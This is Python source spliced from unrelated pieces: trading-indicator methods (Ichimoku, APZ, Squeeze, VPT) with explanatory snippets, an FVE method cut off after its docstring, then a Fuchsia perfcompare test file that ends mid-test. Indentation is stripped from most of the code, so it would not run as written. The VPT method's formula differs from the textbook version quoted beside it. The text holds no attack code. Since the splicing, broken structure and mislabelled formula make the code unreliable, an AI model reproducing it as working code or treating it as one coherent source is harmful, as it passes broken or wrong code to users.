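# Normalize the median price into [-1, 1] over the rolling window.
raw = 2 * ((med - med.rolling(period).min())
           / (med.rolling(period).max() - med.rolling(period).min())) - 1
smooth = raw.ewm(span=5).mean().fillna(0)
# Clip so log((1 + x) / (1 - x)) stays finite at the saturation points.
smooth = smooth.clip(-0.999, 0.999)
fish = np.log((1 + smooth) / (1 - smooth)).ewm(span=3).mean()
```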
@classmethod
def ICHIMOKU(
cls,
ohlc: DataFrame,
tenkan_period: int = 9,
kijun_period: int = 26,
senkou_period: int = 52,
chikou_period: int = 26,
) -> DataFrame:
"""
The Ichimoku Cloud, also known as Ichimoku Kinko Hyo, is a versatile indicator that defines support and resistance,
identifies trend direction, gauges momentum and provides trading signals.
Ichimoku Kinko Hyo translates into “one look equilibrium chart”.
"""
tenkan_sen = pd.Series(
(
ohlc["high"].rolling(window=tenkan_period).max()
+ ohlc["low"].rolling(window=tenkan_period).min()
)
/ 2,
name="TENKAN",
) ## conversion line: midpoint of highest high and lowest low
kijun_sen = pd.Series(
(
ohlc["high"].rolling(window=kijun_period).max()
+ ohlc["low"].rolling(window=kijun_period).min()
)
/ 2,
name="KIJUN",
) ## base line
senkou_span_a = pd.Series(
((tenkan_sen + kijun_sen) / 2).shift(kijun_period), name="senkou_span_a"
) ## leading span A, projected kijun_period bars ahead
senkou_span_b = pd.Series(
(
(
ohlc["high"].rolling(window=senkou_period).max()
+ ohlc["low"].rolling(window=senkou_period).min()
)
/ 2
).shift(kijun_period),
name="SENKOU",
) ## leading span B, projected kijun_period bars ahead
chikou_span = pd.Series(
ohlc["close"].shift(-chikou_period),
name="CHIKOU",
) ## lagging span: close plotted chikou_period bars back
return pd.concat(
[tenkan_sen, kijun_sen, senkou_span_a, senkou_span_b, chikou_span], axis=1
)
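By the textbook definition, Tenkan-sen is the midpoint of the highest high and lowest low over its look-back window. A standalone check of that calculation on toy data:

```python
import pandas as pd

ohlc = pd.DataFrame({
    "high": [10.0, 12.0, 11.0, 13.0, 12.5],
    "low":  [ 9.0, 10.0,  9.5, 11.0, 11.5],
})
window = 3
tenkan = (ohlc["high"].rolling(window).max()
          + ohlc["low"].rolling(window).min()) / 2
# Last window covers rows 2-4: highest high 13, lowest low 9.5 -> 11.25
```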
@classmethod
def APZ(
cls,
ohlc: DataFrame,
period: int = 21,
dev_factor: int = 2,
MA: Series = None,
adjust: bool = True,
) -> DataFrame:
"""
The adaptive price zone (APZ) is a technical indicator developed by <NAME>.
The APZ is a volatility based indicator that appears as a set of bands placed over a price chart.
Especially useful in non-trending, choppy markets,
the APZ was created to help traders find potential turning points in the markets.
"""
if not isinstance(MA, pd.Series):
MA = cls.DEMA(ohlc, period)
price_range = pd.Series(
(ohlc["high"] - ohlc["low"]).ewm(span=period, adjust=adjust).mean()
)
volatility_value = pd.Series(
price_range.ewm(span=period, adjust=adjust).mean(), name="vol_val"
)
# upper_band = dev_factor * volatility_value + dema
upper_band = pd.Series((volatility_value * dev_factor) + MA, name="UPPER")
lower_band = pd.Series(MA - (volatility_value * dev_factor), name="LOWER")
return pd.concat([upper_band, lower_band], axis=1)
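A standalone APZ band construction on toy data; a plain EMA stands in for the DEMA centreline used by the method above (an assumption to keep the example self-contained):

```python
import pandas as pd

ohlc = pd.DataFrame({
    "high":  [10.0, 11.0, 10.5, 11.5, 12.0],
    "low":   [ 9.0,  9.5,  9.8, 10.5, 11.0],
    "close": [ 9.5, 10.5, 10.0, 11.0, 11.8],
})
period, dev_factor = 3, 2
ma = ohlc["close"].ewm(span=period).mean()  # stand-in for DEMA
# Double-smoothed high-low range, as in the APZ method above.
price_range = (ohlc["high"] - ohlc["low"]).ewm(span=period).mean()
volatility = price_range.ewm(span=period).mean()
upper = ma + dev_factor * volatility
lower = ma - dev_factor * volatility
```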
@classmethod
def SQZMI(cls, ohlc: DataFrame, period: int = 20, MA: Series = None) -> Series:
"""
Squeeze Momentum Indicator
The Squeeze indicator attempts to identify periods of consolidation in a market.
In general the market is either in a period of quiet consolidation or vertical price discovery.
By identifying these calm periods, we have a better opportunity of getting into trades with the potential for larger moves.
Once a market enters into a “squeeze”, we watch the overall market momentum to help forecast the market direction and await a release of market energy.
:param pd.DataFrame ohlc: 'open, high, low, close' pandas DataFrame
:period: int - number of periods to take into consideration
:MA pd.Series: override internal calculation which uses SMA with moving average of your choice
:return pd.Series: indicator calcs as pandas Series
SQZMI['SQZ'] is bool True/False. If True, the squeeze is on; if False, the squeeze has fired.
"""
if not isinstance(MA, pd.core.series.Series):
ma = pd.Series(cls.SMA(ohlc, period))
else:
ma = MA
bb = cls.BBANDS(ohlc, period=period, MA=ma)
kc = cls.KC(ohlc, period=period, kc_mult=1.5)
comb = pd.concat([bb, kc], axis=1)
comb["SQZ"] = (comb["BB_LOWER"] > comb["KC_LOWER"]) & (
comb["BB_UPPER"] < comb["KC_UPPER"]
)
return pd.Series(comb["SQZ"], name="{0} period SQZMI".format(period))
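The squeeze test above reduces to a single condition: both Bollinger Bands sit inside the Keltner Channel. A tiny table makes it concrete:

```python
import pandas as pd

# Hypothetical band values for two bars.
comb = pd.DataFrame({
    "BB_LOWER": [ 9.8,  9.0],
    "BB_UPPER": [10.2, 11.0],
    "KC_LOWER": [ 9.5,  9.5],
    "KC_UPPER": [10.5, 10.5],
})
sqz = (comb["BB_LOWER"] > comb["KC_LOWER"]) & (comb["BB_UPPER"] < comb["KC_UPPER"])
# Row 0: bands inside the channel -> squeeze on; row 1: outside -> off.
```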
@classmethod
def VPT(cls, ohlc: DataFrame) -> Series:
"""
Volume Price Trend
The Volume Price Trend uses the difference of price and previous price with volume and feedback to arrive at its final form.
If there appears to be a bullish divergence of price and the VPT (upward slope of the VPT and downward slope of the price) a buy opportunity exists.
Conversely, a bearish divergence (downward slope of the VPT and upward slope of the price) implies a sell opportunity.
"""
hilow = (ohlc["high"] - ohlc["low"]) * 100
openclose = (ohlc["close"] - ohlc["open"]) * 100
vol = ohlc["volume"] / hilow
spreadvol = (openclose * vol).cumsum()
return pd.Series(spreadvol, name="VPT")
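For comparison, the textbook Volume Price Trend recurrence accumulates volume weighted by the relative price change, VPT_t = VPT_{t-1} + volume_t * (close_t - close_{t-1}) / close_{t-1}:

```python
import pandas as pd

close = pd.Series([10.0, 11.0, 10.45])
volume = pd.Series([100.0, 200.0, 150.0])
# pct_change gives (close_t - close_{t-1}) / close_{t-1}.
vpt = (volume * close.pct_change()).cumsum()
# Bar 1 adds 200 * 0.10 = 20; bar 2 adds 150 * (-0.05) = -7.5 -> 12.5
```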
@classmethod
def FVE(cls, ohlc: DataFrame, period: int = 22, factor: float = 0.3) -> Series:
"""
FVE is a money flow indicator."""
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import io
import json
import os
import re
import shutil
import subprocess
import sys
import tarfile
import tempfile
import unittest
import numpy
import perfcompare
# Test case helper class for creating temporary directories that will
# be cleaned up when the test finishes.
class TempDirTestCase(unittest.TestCase):
def setUp(self):
self._on_teardown = []
def MakeTempDir(self):
temp_dir = tempfile.mkdtemp(
prefix='tmp_unittest_%s_' % self.__class__.__name__)
def tear_down():
shutil.rmtree(temp_dir)
self._on_teardown.append(tear_down)
return temp_dir
def tearDown(self):
for func in reversed(self._on_teardown):
func()
def WriteJsonFile(filename, json_data):
with open(filename, 'w') as fh:
json.dump(json_data, fh)
def ReadGoldenFile(filename):
with open(filename, 'r') as fh:
data = fh.read()
matches = list(re.finditer(r'\n\n### (.*)\n', data, re.M))
starts = [m.end() for m in matches]
ends = [m.start() for m in matches[1:]] + [len(data)]
for m, start, end in zip(matches, starts, ends):
yield m.group(1), data[start:end]
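A small demonstration of the golden-file format that ReadGoldenFile parses: sections are introduced by a "\n\n### name\n" header, and each body runs to the next header (or end of file).

```python
import re

data = '\n\n### first\nbody one\n\n### second\nbody two\n'
matches = list(re.finditer(r'\n\n### (.*)\n', data, re.M))
starts = [m.end() for m in matches]
ends = [m.start() for m in matches[1:]] + [len(data)]
cases = {m.group(1): data[s:e] for m, s, e in zip(matches, starts, ends)}
# The "\n\n" before the next header belongs to that header's match,
# so it is excluded from the preceding body.
```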
# Helper for checking against test expectations in a golden file.
# This provides an implementation of AssertCaseEq() that compares
# results against the golden file.
class GoldenDataInput(object):
def __init__(self, filename):
self._cases = dict(ReadGoldenFile(filename))
def AssertCaseEq(self, name, actual):
expected = self._cases[name]
if expected != actual:
raise AssertionError('"%s" != "%s"' % (actual, expected))
# This provides an implementation of AssertCaseEq() that updates the
# golden file with new expectations generated by the tests.
class GoldenDataOutput(object):
def __init__(self):
self._cases = {}
def AssertCaseEq(self, name, actual):
assert name not in self._cases, name
self._cases[name] = actual
def WriteFile(self, filename):
with open(filename, 'w') as fh:
for name, data in sorted(self._cases.items()):
fh.write('\n\n### %s\n%s' % (name, data))
GOLDEN_FILE = os.path.join(
os.path.dirname(__file__), 'perfcompare_test_output.txt')
GOLDEN = GoldenDataInput(GOLDEN_FILE)
def TestMain():
global GOLDEN
if '--generate' in sys.argv:
sys.argv.pop(sys.argv.index('--generate'))
GOLDEN = GoldenDataOutput()
try:
unittest.main()
finally:
GOLDEN.WriteFile(GOLDEN_FILE)
else:
unittest.main()
# Test data from a normal distribution, generated using the following code:
# ', '.join('%.4f' % random.gauss(0, 1) for _ in xrange(100))
TEST_VALUES = [
0.4171, 2.1056, -0.0223, -1.6592, 0.4766, -0.6405, 0.3488, 1.5729, 2.0654,
-0.1324, -0.8648, -0.2793, -0.7966, 0.2851, -0.9374, -2.0275, 0.8222,
-0.2396, -0.6982, 0.9067, 0.9416, -2.2870, -0.1868, 1.0700, -1.2531, 0.8455,
1.4755, 0.2979, 0.3441, 0.6694, -0.1808, -0.9038, 0.8267, -0.4320, -0.7166,
0.3757, -0.5135, -0.9497, 2.0372, -0.3364, 0.3879, -0.2970, 1.3872, 0.6538,
1.0674, 1.2349, -0.6873, -0.1807, 0.6867, -0.1150, -1.0526, -0.6853,
-0.5858, -1.8460, 1.6041, -1.1638, 0.5459, -1.6476, -0.8711, -0.9001,
0.0788, -0.8170, 0.2439, 0.0129, -0.8674, -1.1076, -0.0074, -0.6230,
-0.4761, -2.2526, 0.4906, -0.5001, -0.2050, 0.7623, -0.5511, -0.2837,
-0.8797, -0.5374, -1.2910, 0.9551, 0.4483, -0.6352, -0.3334, -0.5105,
0.1073, 2.9131, -0.4941, -0.2808, -0.2517, -1.9961, 0.9214, -0.6325,
-1.1895, 0.8118, 1.5424, 0.5601, -1.0322, 0.7135, -0.2780, -0.1128
]
def GenerateTestData(mean, stddev):
return [x * stddev + mean for x in TEST_VALUES]
# This is an example of a slow running time value for an initial run of a
# test. This should be skipped by the software under test.
SLOW_INITIAL_RUN = [1e6]
class FormatConfidenceIntervalTest(unittest.TestCase):
def test_confidence_interval_formatting(self):
Format = perfcompare.FormatConfidenceInterval
self.assertEqual(Format(12345.6789, 2222), '12346 +/- 2222')
self.assertEqual(Format(12345.6789, 0.02222), '12345.679 +/- 0.022')
self.assertEqual(Format(12345.6789, 0.07777), '12345.679 +/- 0.078')
self.assertEqual(Format(12345.6789, 0.09911), '12345.679 +/- 0.099')
# Corner case: rounding 0.09950 to 2 significant figures produces
# 0.100, which looks like 3 significant figures rather than 2.
self.assertEqual(Format(12345.6789, 0.09950), '12345.679 +/- 0.100')
self.assertEqual(Format(12345.6789, 2e-5), '12345.678900 +/- 0.000020')
# Corner case: the offset is a power of 10.
self.assertEqual(Format(12345.6789, 0.1), '12345.68 +/- 0.10')
self.assertEqual(Format(12345.6789, 0.01), '12345.679 +/- 0.010')
# Corner case: zero offset.
self.assertEqual(Format(12345.6789, 0), '12345.7 +/- 0')
# Corner case: negative offset. This does not make sense for a
# confidence interval and should not happen, but let's ensure it
# gets formatted anyway in case it is useful for debugging.
self.assertEqual(Format(12345.6789, -1), '12345.7 +/- -1')
# Corner cases: infinity and NaN.
self.assertEqual(Format(12345.6789, numpy.inf), '12345.7 +/- inf')
self.assertEqual(Format(12345.6789, -numpy.inf), '12345.7 +/- -inf')
self.assertEqual(Format(12345.6789, numpy.nan), '12345.7 +/- nan')
self.assertEqual(Format(numpy.inf, 0.1234), 'inf +/- 0.12')
self.assertEqual(Format(-numpy.inf, 0.1234), '-inf +/- 0.12')
self.assertEqual(Format(numpy.nan, 0.1234), 'nan +/- 0.12')
# Generate some example perf test data, allowing variation at each level of
# the sampling process (per boot, per process, and per iteration within
# each process). This follows a random effects model. Returns a list of
# lists of lists of values.
def GenerateData(
mean=1000,
stddev_across_boots=0,
stddev_across_processes=0,
stddev_across_iters=0):
it = iter(TEST_VALUES)
def GenerateValues(mean, stddev, count):
return [next(it) * stddev + mean for _ in range(count)]
# This reads 4**3 + 4**2 + 4 = 84 values from TEST_VALUES, so it does
# not exceed the number of values in TEST_VALUES.
return [
[
SLOW_INITIAL_RUN +
GenerateValues(mean_within_process, stddev_across_iters, 4)
for mean_within_process in GenerateValues(
mean_within_boot, stddev_across_processes, 4)
]
for mean_within_boot in GenerateValues(mean, stddev_across_boots, 4)
]
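The nesting above can be checked by counting draws: 4 boot means, 4 process means per boot, and 4 iteration values per process consume 4 + 16 + 64 = 84 values, which is why the comment notes it fits within the 100 TEST_VALUES. A counting sketch with hypothetical names (zero variance, so only the structure matters):

```python
import itertools

counter = itertools.count()

def draw(mean, stddev, count):
    # Stand-in for GenerateValues: one counter tick per value drawn.
    return [next(counter) * stddev + mean for _ in range(count)]

data = [
    [draw(pm, 0, 4) for pm in draw(bm, 0, 4)]
    for bm in draw(0, 0, 4)
]
total_draws = next(counter)  # number of values consumed so far
```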
class StatisticsTest(TempDirTestCase):
def ResultsDictForValues(self, run_values):
return {
'label': 'ExampleTest',
'test_suite': 'example_suite',
'unit': 'nanoseconds',
'values': run_values
}
# Given data in the format returned by GenerateData(), writes this data
# to a temporary directory.
def DirOfData(self, data):
dir_path = self.MakeTempDir()
os.mkdir(os.path.join(dir_path, 'by_boot'))
for boot_idx, results_for_boot in enumerate(data):
test_dir = os.path.join(
dir_path, 'by_boot', 'boot%06d' % boot_idx, 'test-name',
'subdir')
os.makedirs(test_dir)
for process_idx, run_values in enumerate(results_for_boot):
dest_file = os.path.join(
test_dir,
'example_process%06d.fuchsiaperf.json' % process_idx)
WriteJsonFile(
dest_file, [self.ResultsDictForValues(run_values)])
return dir_path
# Sanity-check that DirOfData() writes data in the correct format by
# reading back some simple test data.
def test_readback_of_data(self):
data = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]
dataset = perfcompare.MultiBootDataset(self.DirOfData(data))
boot_datasets = list(dataset.GetBootDatasets())
self.assertEqual(len(boot_datasets), 2)
self.assertEqual(
list(boot_datasets[0].GetProcessDatasets()), [
[self.ResultsDictForValues([1, 2])],
[self.ResultsDictForValues([3, 4])]
])
self.assertEqual(
list(boot_datasets[1].GetProcessDatasets()), [
[self.ResultsDictForValues([5, 6])],
[self.ResultsDictForValues([7, 8])]
])
def TarFileOfDir(self, dir_path, write_mode):
tar_filename = os.path.join(self.MakeTempDir(), 'out.tar')
with tarfile.open(tar_filename, write_mode) as tar:
for name in os.listdir(dir_path):
tar.add(os.path.join(dir_path, name), arcname=name)
return tar_filename
def test_readback_of_data_from_tar_file(self):
data = [[[1, 2], [3, 4]]]
dir_path = self.DirOfData(data)
self.assertEqual(len(os.listdir(os.path.join(dir_path, 'by_boot'))), 1)
# Test the uncompressed and gzipped cases.
for write_mode in ('w', 'w:gz'):
tar_filename = self.TarFileOfDir(
os.path.join(dir_path, 'by_boot', 'boot000000'), write_mode)
boot_dataset = perfcompare.SingleBootDataset(tar_filename)
self.assertEqual(
list(boot_dataset.GetProcessDatasets()), [
[self.ResultsDictForValues([1, 2])],
[self.ResultsDictForValues([3, 4])]
])
def CheckConfidenceInterval(self, data, interval_string):
dir_path = self.DirOfData(data)
test_name = 'example_suite: ExampleTest'
stats = perfcompare.StatsFromMultiBootDataset(
perfcompare.MultiBootDataset(dir_path))[test_name]
self.assertEqual(stats.FormatConfidenceInterval(), interval_string)
# Test the CIs produced with variation at different levels of the
# multi-level sampling process.
def test_confidence_intervals(self):
self.CheckConfidenceInterval(GenerateData(), '1000 +/- 0 ns')
self.CheckConfidenceInterval(
GenerateData(stddev_across_boots=100), '1021 +/- 452 ns')
self.CheckConfidenceInterval(
GenerateData(stddev_across_processes=100), '1012 +/- 151 ns')
self.CheckConfidenceInterval(
GenerateData(stddev_across_iters=100), '981 +/- 74 ns')
# Test the case where just a single value is produced per process run.
def test_confidence_interval_with_single_value_per_process(self):
self.CheckConfidenceInterval([[[100]], [[101]]], '100 +/- 32 ns')
# If the "before" and "after" results have identical confidence
# intervals, that should be treated as "no difference", including when
# the CIs are zero-width (as tested here).
def test_comparing_equal_zero_width_confidence_intervals(self):
dir_path = self.DirOfData([[[200]], [[200]]])
stdout = io.StringIO()
perfcompare.Main(['compare_perf', dir_path, dir_path], stdout)
output = stdout.getvalue()
GOLDEN.AssertCaseEq('comparison_no_change_zero_width_ci', output)
class PerfCompareTest(TempDirTestCase):
def AddIgnoredFiles(self, dest_dir):
# Include a summary.json file to check that we skip reading it.
with open(os.path.join(dest_dir, 'summary.json'), 'w') as fh:
fh.write('dummy_data')
# Include a *.catapult_json file to check that we skip reading these.
with open(os.path.join(dest_dir, 'foo.catapult_json'), 'w') as fh:
fh.write('dummy_data')
def WriteExampleDataDir(
self,
dir_path,
mean=1000,
stddev=100,
drop_one=False,
single_boot=False):
results = [('ClockGetTimeExample', GenerateTestData(mean, stddev))]
if not drop_one:
results.append(('SecondExample', GenerateTestData(2000, 300)))
if single_boot:
for test_name, values in results:
dest_dir = os.path.join(dir_path, 'by_boot', 'boot0')
dest_file = os.path.join(
dest_dir, '%s.fuchsiaperf.json' % test_name)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
self.AddIgnoredFiles(dest_dir)
WriteJsonFile(
dest_file, [
{
'label': test_name,
'test_suite': 'fuchsia.example',
'unit': 'nanoseconds',
'values': SLOW_INITIAL_RUN + values
}
])
else:
for test_name, values in results:
for idx, value in enumerate(values):
dest_dir = os.path.join(
dir_path, 'by_boot', 'boot%06d' % idx)
dest_file = os.path.join(
dest_dir, '%s.fuchsiaperf.json' % test_name)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
self.AddIgnoredFiles(dest_dir)
WriteJsonFile(
dest_file, [
{
'label': test_name,
'test_suite': 'fuchsia.example',
'unit': 'nanoseconds',
'values': SLOW_INITIAL_RUN + [value]
}
])
def ExampleDataDir(self, **kwargs):
dir_path = self.MakeTempDir()
self.WriteExampleDataDir(dir_path, **kwargs)
return dir_path
def test_reading_results_from_dir(self):
dir_path = self.ExampleDataDir()
results = perfcompare.StatsFromMultiBootDataset(
perfcompare.MultiBootDataset(dir_path))
test_name = 'fuchsia.example: ClockGetTimeExample'
self.assertEqual(
results[test_name].FormatConfidenceInterval(), '992 +/- 26 ns')
# Returns the output of compare_perf when run on the given directories.
def ComparePerf(self, before_dir, after_dir):
stdout = io.StringIO()
perfcompare.Main(['compare_perf', before_dir, after_dir], stdout)
return stdout.getvalue()
def test_mean_and_stddev(self):
values = [10, 5, 15]
mean_val, stddev_val = perfcompare.MeanAndStddev(values)
self.assertEqual(mean_val, 10.0)
self.assertEqual(perfcompare.Mean(values), 10.0)
self.assertEqual(stddev_val, 5.0)
# Single-value sample.
self.assertEqual(perfcompare.MeanAndStddev([123]), (123.0, None))
# Check error cases.
self.assertRaises(AssertionError, lambda: perfcompare.Mean([]))
self.assertRaises(AssertionError, lambda: perfcompare.MeanAndStddev([]))
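The assertions above pin down MeanAndStddev's contract. A sketch consistent with them (sample standard deviation with ddof=1, `None` for a single value, assertion failure on empty input); the real perfcompare implementation may differ in detail:

```python
import math

def mean_and_stddev(values):
    """Sketch of MeanAndStddev's behavior as exercised by the tests."""
    assert len(values) > 0
    mean = sum(values) / len(values)
    if len(values) == 1:
        return mean, None  # stddev undefined for a single sample
    # Sample variance: divide by n - 1 (Bessel's correction), so that
    # [10, 5, 15] gives stddev exactly 5.0 as asserted above.
    var = sum((x - mean) ** 2 for x in values) / (len(values) - 1)
    return mean, math.sqrt(var)
```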
# Check that data written using the golden file helper reads back
# the same.
def test_golden_file_write_and_read(self):
temp_file = os.path.join(self.MakeTempDir(), 'file')
writer = GoldenDataOutput()
writer.AssertCaseEq('a_key', 'a_value')
writer.AssertCaseEq('b_key', 'line 1\n' 'line 2')